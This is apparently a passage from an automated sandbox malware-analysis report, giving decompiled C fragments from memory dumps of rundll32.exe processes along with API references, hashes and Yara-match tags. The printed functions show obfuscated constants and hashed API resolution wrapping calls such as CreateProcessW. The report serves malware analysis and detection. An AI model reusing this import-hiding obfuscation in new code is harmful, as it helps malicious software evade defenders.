				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E4BCCF1(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E4BCCF1(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E4BC537(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E4BC46A(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E4BCFB6(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E4BF563(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                          0x6e4bd3e0
                          0x6e4bd3e0
                          0x6e4bd3e7
                          0x6e4bd3f0
                          0x6e4bd50f
                          0x6e4bd3f6
                          0x6e4bd3f6
                          0x6e4bd3f7
                          0x6e4bd3f8
                          0x6e4bd402
                          0x6e4bd405
                          0x6e4bd40b
                          0x6e4bd415
                          0x6e4bd43a
                          0x6e4bd43f
                          0x6e4bd444
                          0x6e4bd50b
                          0x00000000
                          0x6e4bd50c
                          0x6e4bd444
                          0x6e4bd415
                          0x6e4bd44a
                          0x6e4bd44d
                          0x6e4bd450
                          0x6e4bd456
                          0x6e4bd45c
                          0x6e4bd46e
                          0x6e4bd473
                          0x6e4bd476
                          0x6e4bd479
                          0x6e4bd47c
                          0x6e4bd47f
                          0x6e4bd485
                          0x6e4bd48b
                          0x6e4bd48e
                          0x6e4bd491
                          0x6e4bd4a0
                          0x6e4bd4a1
                          0x6e4bd4a1
                          0x6e4bd4a6
                          0x6e4bd4b9
                          0x6e4bd4bb
                          0x6e4bd4c0
                          0x6e4bd4cb
                          0x6e4bd4cd
                          0x6e4bd4cf
                          0x6e4bd4eb
                          0x6e4bd4f0
                          0x6e4bd4f3
                          0x6e4bd4f3
                          0x6e4bd4cb
                          0x6e4bd4c0
                          0x6e4bd4f9
                          0x6e4bd4fa
                          0x6e4bd4fd
                          0x6e4bd500
                          0x6e4bd503
                          0x6e4bd506
                          0x6e4bd491
                          0x00000000
                          0x6e4bd485
                          0x6e4bd510
                          0x6e4bd515
                          0x6e4bd519
                          0x6e4bd51c
                          0x6e4bd51d
                          0x6e4bd51e
                          0x6e4bd51f
                          0x6e4bd524
                          0x6e4bd59c
                          0x6e4bd59e
                          0x6e4bd526
                          0x6e4bd526
                          0x6e4bd52c
                          0x00000000
                          0x6e4bd52e
                          0x6e4bd531
                          0x6e4bd534
                          0x6e4bd53b
                          0x6e4bd53e
                          0x6e4bd542
                          0x6e4bd574
                          0x6e4bd577
                          0x6e4bd57e
                          0x6e4bd584
                          0x6e4bd58e
                          0x6e4bd597
                          0x6e4bd597
                          0x6e4bd58e
                          0x6e4bd584
                          0x6e4bd598
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd547
                          0x6e4bd547
                          0x6e4bd54b
                          0x00000000
                          0x00000000
                          0x6e4bd54f
                          0x6e4bd563
                          0x6e4bd563
                          0x6e4bd551
                          0x6e4bd551
                          0x6e4bd557
                          0x00000000
                          0x6e4bd559
                          0x6e4bd559
                          0x6e4bd55c
                          0x6e4bd561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd561
                          0x6e4bd557
                          0x6e4bd56c
                          0x6e4bd56e
                          0x00000000
                          0x6e4bd570
                          0x6e4bd570
                          0x6e4bd570
                          0x00000000
                          0x6e4bd56e
                          0x6e4bd567
                          0x6e4bd569
                          0x00000000
                          0x6e4bd569
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd534
                          0x6e4bd52c
                          0x6e4bd59f
                          0x6e4bd5a3
                          0x6e4bd5a3

                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E4BD405
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 9eb22af878f9d15631bab55fd8957f22d619f9b889d039e25fd3dcf3f6c39496
                          • Instruction ID: ba8980abf20df14db5117dd6572c89e9daa18173a818db81c2fc6308fb62bae2
                          • Opcode Fuzzy Hash: 9eb22af878f9d15631bab55fd8957f22d619f9b889d039e25fd3dcf3f6c39496
                          • Instruction Fuzzy Hash: 13415A71900209AFDF05CFE5C981EDE7BB5BF48308F14809AF9196A254D335A951DFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 3000 Parent PID: 4612 rundll32.exeCOMMON

                          Executed Functions

                          Function 031A505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E031A505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E031B0A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}







                          0x031a5065
                          0x031a507c
                          0x031a5084
                          0x031a508b
                          0x031a5092
                          0x031a509d
                          0x031a50a0
                          0x031a50a4
                          0x031a50ab
                          0x031a50b2
                          0x031a50b9
                          0x031a50c9
                          0x031a50d3

                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 031A50D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, Offset: 031A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: KxA
                          • API String ID: 621844428-223459762
                          • Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction ID: c6ce2cd87c421f8ea658f1dcdca8fb3826e78fb3e69263bbe0a67eb68f9b4ebe
                          • Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction Fuzzy Hash: B001F274D05208FBCB48DFE9D94698DFFB4EB44304F218199E511AB2A0D7702B989B05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 031A2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E031A2C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E031A358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E031B0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x031a2c41
                          0x031a2c44
                          0x031a2c46
                          0x031a2c49
                          0x031a2c4c
                          0x031a2c4d
                          0x031a2c4e
                          0x031a2c53
                          0x031a2c5d
                          0x031a2c64
                          0x031a2c6b
                          0x031a2c72
                          0x031a2c79
                          0x031a2c80
                          0x031a2c87
                          0x031a2c8e
                          0x031a2caf
                          0x031a2cbb
                          0x031a2cc1

                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 031A2CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, Offset: 031A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: 2cc566588505edfaa6b56e8461791aa0ef8cb4f9cfca53951d2b7afe19edce6e
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: E0011679D01248BBDB05DFD5994A9DEBFB4EF44210F00C088E81966220D7719B149B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 031AF66B, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E031AF66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E031A358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E031B0A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}











                          0x031af673
                          0x031af678
                          0x031af67a
                          0x031af67d
                          0x031af67e
                          0x031af681
                          0x031af684
                          0x031af687
                          0x031af688
                          0x031af689
                          0x031af68c
                          0x031af68f
                          0x031af692
                          0x031af695
                          0x031af698
                          0x031af699
                          0x031af69c
                          0x031af69d
                          0x031af69e
                          0x031af6a3
                          0x031af6ad
                          0x031af6bc
                          0x031af6bf
                          0x031af6c2
                          0x031af6c9
                          0x031af6d0
                          0x031af6dc
                          0x031af6dd
                          0x031af6e2
                          0x031af6e9
                          0x031af6fa
                          0x031af6fd
                          0x031af719
                          0x031af733
                          0x031af73a

                          APIs
                          • CreateProcessW.KERNELBASE(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 031AF733
                          Memory Dump Source
                          • Source File: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, Offset: 031A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction ID: 2b58f3a75091a788b3c1c9806009bfaa6f076348403753ca4cabad56fd74b03c
                          • Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction Fuzzy Hash: C721F836900248FBDF15DF95CC0ACDFBFBAEB89700F008049FA1466250D7B69A60DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Analysis Process: rundll32.exe PID: 3080 Parent PID: 3112 rundll32.exeCOMMON

                          Executed Functions

                          Function 0340505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0340505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E03410A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}







                          0x03405065
                          0x0340507c
                          0x03405084
                          0x0340508b
                          0x03405092
                          0x0340509d
                          0x034050a0
                          0x034050a4
                          0x034050ab
                          0x034050b2
                          0x034050b9
                          0x034050c9
                          0x034050d3

                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 034050D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: KxA
                          • API String ID: 621844428-223459762
                          • Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction ID: b30bce67e03b2fdba73aef5d395e8859c2d31d0d3d4fa14b96bf025cca954a62
                          • Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction Fuzzy Hash: D101F274D05208FFCB48DFE9D946A8DFFB4EB40304F218199E511AB2A0D7702BA89B05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 03402C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E03402C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0340358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E03410A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x03402c41
                          0x03402c44
                          0x03402c46
                          0x03402c49
                          0x03402c4c
                          0x03402c4d
                          0x03402c4e
                          0x03402c53
                          0x03402c5d
                          0x03402c64
                          0x03402c6b
                          0x03402c72
                          0x03402c79
                          0x03402c80
                          0x03402c87
                          0x03402c8e
                          0x03402caf
                          0x03402cbb
                          0x03402cc1

                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 03402CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: 99d5f8161f1be02535710298fe4d0e4d776c4f2fe95315fa90aae486a11231b3
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: 5B011679D01248BFDB05DFD6994A99EBFB4EF04210F00C099E8196A220D7719B249B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0340F66B, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E0340F66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0340358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E03410A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}











                          0x0340f673
                          0x0340f678
                          0x0340f67a
                          0x0340f67d
                          0x0340f67e
                          0x0340f681
                          0x0340f684
                          0x0340f687
                          0x0340f688
                          0x0340f689
                          0x0340f68c
                          0x0340f68f
                          0x0340f692
                          0x0340f695
                          0x0340f698
                          0x0340f699
                          0x0340f69c
                          0x0340f69d
                          0x0340f69e
                          0x0340f6a3
                          0x0340f6ad
                          0x0340f6bc
                          0x0340f6bf
                          0x0340f6c2
                          0x0340f6c9
                          0x0340f6d0
                          0x0340f6dc
                          0x0340f6dd
                          0x0340f6e2
                          0x0340f6e9
                          0x0340f6fa
                          0x0340f6fd
                          0x0340f719
                          0x0340f733
                          0x0340f73a

                          APIs
                          • CreateProcessW.KERNELBASE(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0340F733
                          Memory Dump Source
                          • Source File: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction ID: 58cda3785c6e99576f8303d3902eb5e881954c2f9ff3900fe1d80d5e87cbf38b
                          • Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction Fuzzy Hash: B621F736900248BBDF15DF96CC0ACDFBFBAEB89700F008049FA1466260D6B69A60DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions